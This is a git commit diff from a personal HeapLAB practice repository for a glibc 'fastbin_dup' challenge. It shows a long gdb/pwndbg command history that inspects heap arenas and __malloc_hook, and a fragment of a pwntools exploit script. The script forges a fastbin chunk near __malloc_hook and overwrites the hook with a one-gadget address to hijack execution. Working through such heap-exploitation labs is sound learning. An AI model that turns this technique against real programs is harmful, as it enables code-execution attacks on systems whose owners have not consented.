modified: HeapLAB/challenge-fastbin_dup/.gdb_history

modified:   HeapLAB/challenge-fastbin_dup/bruh.py
This commit is contained in:
Brett Weiland 2021-01-04 20:25:35 -06:00
parent 4c06c05f4e
commit 93f5247d9c
2 changed files with 71 additions and 66 deletions

View File

@ -1,68 +1,3 @@
c
x 0x7f4854db6b40
c
x 0x7f4854db6b40
x main_arena
x &main_arena
x &__malloc_hook
x main_arena.top
db main_arena.top
c
c
c
q
print __malloc_hook
print __malloc_hook
fastbins
c
fastbins
c
vis_heap_chunks
c
fastbins
r
c
fastbins
print main_arena
vis_heap
c
fastbins
fastbins
c
fastbins
r
c
quit
db main_arena
db &main_arena.fastbinsY
q
r
c
c
fastbins
print &main_arena
print main_arena
c
print main_arena
db main_arena
db &main_arena
db &main_arena/100
db &main_arena 100
db &main_arena 1000
q
db main_arena.bins
db &main_arena.fastbinsY
run
c
c
q
r
c
fastbins
c
fastbins
c
fastbins
r
c
c
@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
db
c
db &__malloc_hook-(16) (16*8)
exit
quit
x rsp
print $rsp+50
print $rsp
print $*rsp
print $rsp
print (void*)$rsp
print (void*)$rsp+50
print (void*)*$rsp+50
print (void*)&$rsp+50
x 0x7ffc1644e71a
print (void*)&$rsp+50
print (void*)$rsp+50
print (void*)$rsp+0x50
x 0x7ffc1644e738
quit
q
print main_arena
find_fake_fast &__malloc_hook
q
quit
fastbins
find_fake_fast &__malloc_hook
print (void*)&__malloc_hook
q
x &__malloc_hook
db &__malloc_hook-(16) (16*8)
db &__malloc_hook-(16) (17*8)
db &__malloc_hook-(16) (18*8)
db &__malloc_hook-(16) (19*8)
db &__malloc_hook-(16) (20*8)
quit
db &__malloc_hook-(16) (20*8)
db &__malloc_hook-(16) (16*8)
db &__malloc_hook-(16) (20*8)
quit
db &__malloc_hook-(16) (20*8)
find_fake_fast &__malloc_hook
db 0x7fd4a6cf7b2d-(16) (20*8)
q
print main_arena
vis_heap_chunks
db 0x7f37a78ddb7d-(16) (20*8)
db 0x7f37a78ddb7d-(32) (20*8)
quit
db 0x7f37a78ddb7d-(32) (20*8)
db main_arena.top-(32) (20*8)
search 0x7f323f6f0fa1
search 0x7f323f6f0fa1
search --help
search --qword 0x7f323f6f0fa1
search -p 0x7f323f6f0fa1
search -p 0x0fa1
search -p 0xa10f
search -hexp 0x7f323f6f0fa1
search --hex 0x7f323f6f0fa1
search --hex 7f323f6f0fa1
search --hex -8 7f323f6f0fa1
search -8 --hex 7f323f6f0fa1
search -t qword --hex 7f323f6f0fa1
search -t qword -x 7f323f6f0fa1
search -t qword -x 0x7f323f6f0fa1
search -t qword 0x7f323f6f0fa1
quit

View File

@ -74,9 +74,14 @@ malloc(119, 'sdfg')
#8 * 9
payload_loc = libc.sym.__malloc_hook - 35
payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
malloc(119, p64(0)*9 + p64(payload_loc))
#we now have things in place and shit
onegadget = libc.address + 0xe1fa1
malloc(72, p64(0)*(35) + p64(onegadget))
print("onegadget: {}".format(hex(onegadget)))
print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================